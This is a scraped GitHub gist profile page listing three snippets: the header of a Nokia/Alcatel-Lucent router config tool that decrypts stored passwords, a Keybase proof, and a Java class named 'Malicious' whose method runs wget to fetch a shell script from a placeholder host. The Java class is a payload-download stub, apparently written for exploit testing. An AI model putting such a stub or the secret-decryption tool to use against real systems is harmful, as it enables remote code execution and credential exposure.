Skip to content

Instantly share code, notes, and snippets.

View ClaudeWittebron's full-sized avatar

Claude Wittebron ClaudeWittebron

View GitHub Profile
@ClaudeWittebron
ClaudeWittebron / nokia-router-cfg-tool.py
Created May 5, 2024 07:44 — forked from thedroidgeek/nokia-router-cfg-tool.py
Nokia/Alcatel-Lucent router backup configuration tool
#!/usr/bin/env python3
#
# Nokia/Alcatel-Lucent router backup configuration tool
#
# Features:
# - Unpack/repack .cfg files generated from the backup and restore functionnality
# in order to modify the full router configuration
# - Decrypt/encrypt the passwords/secret values present in the configuration

Keybase proof

I hereby claim:

  • I am claudewittebron on github.
  • I am claudewittebron (https://keybase.io/claudewittebron) on keybase.
  • I have a public key ASBBmIC9wozfVsm3RtcYwuxv7VBWqmbcYV-_ln6zMLcLywo

To claim this, I am signing this object:

public class Malicious {
public static void bang() {
try {
System.out.println("Program Started P Exploit...");
java.lang.Runtime.getRuntime().exec(new String[]{"wget","http://x.x.x.x.com/1.sh"}); //Mac
} catch (Exception e) {
}
}
}